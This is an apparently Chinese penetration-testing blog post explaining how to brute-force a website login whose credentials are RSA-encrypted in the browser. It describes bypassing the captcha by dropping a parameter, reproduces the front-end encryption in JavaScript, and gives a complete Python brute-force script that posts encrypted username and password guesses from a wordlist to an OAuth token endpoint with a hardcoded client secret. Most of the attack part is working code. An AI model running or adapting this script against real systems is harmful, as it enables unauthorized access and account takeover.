当遇到前端RSA加密的时候暴力破解的方法

字数统计: 602字   |   阅读时长≈ 2分

某网站登录的时候如下:[](https//shs3.b.qianxin.com/attack_forum/2021/06/a…

某网站登录的时候如下:

然后我去掉j_authcode以及一些无用参数,可以绕过图形验证码

然后这样就可以进行爆破了。但是我们可以看到usernamepassword均经过加密,这究竟是什么加密呢?我们来看看前端代码。

可以看到这里是RSA加密。然后通过断点查看exponentmodulus的值。

值是固定的,搜索后发现就存储在config.js中,也就是说RSA公钥为modulus
但这是一个256位公钥的RSA加密,在其他环境中几乎找不到这种加密项目,而js中有RSA.js/Barrett.js/BigInt.js这么一个早期项目。这种时候就需要用python去调js代码来进行加密。

先写出js加密的代码来看看效果:

<script src="./rsa/RSA.js" type="text/javascript"></script>
<script src="./rsa/BigInt.js" type="text/javascript"></script>
<script src="./rsa/Barrett.js" type="text/javascript"></script>
<script src="./rsa/config.js" type="text/javascript"></script>
<script>
functiona(paramStr){
setMaxDigits(130);
key = new RSAKeyPair(exponent, "", modulus); 
return encryptedString(key,encodeURIComponent(paramStr));
}
qqq= a("admin");
alert(qqq);
</script>


这里可以看到和Burp Suite里是一模一样,然后把4个js带html里的js代码合并在同一个文件里,用python的execjs库去调。

import execjs
defrsa(str):
file = 'RSA.js'
ctx = execjs.compile(open(file).read())
js = 'a("'+str+'")'
params = ctx.eval(js)
return params
print(rsa("admin"))


最后写出来爆破的脚本:

import requests
import execjs
requests.packages.urllib3.disable_warnings()
defurlpost(username,password):
rusername = rsa(username)
rpassword = rsa(password)
url = "https://x.com/oauth/token"
header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0)Gecko/20100101 Firefox/79.0",
  "X-Requested-With": "XMLHttpRequest",
  "Content-Type": "application/x-www-form-urlencoded"
  }
cookie = {}
data = {"username":rusername,
"password":rpassword,
"grant_type":"password",
"scope":"service",
"client_id":"spm",
"client_secret":"sinoprof"
}
r =requests.post(url,cookies=cookie,headers=header,data=data,allow_redirects=False,verify=False)
print(r.status_code)
if r.status_code == 200:
print(username+password+"success")
exit()
else:
print(username+password+"error")
defrsa(str):
file = 'RSA.js'
ctx = execjs.compile(open(file).read())
js = 'a("'+str+'")'
params = ctx.eval(js)
return params
folist= open('user.txt','r')
for i in folist.readlines():
i = i.replace('\n','')
urlpost(i,i+"!@#456")
urlpost(i,i+"!@#123")
urlpost(i,"123456")

最终效果如下图所示:


谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。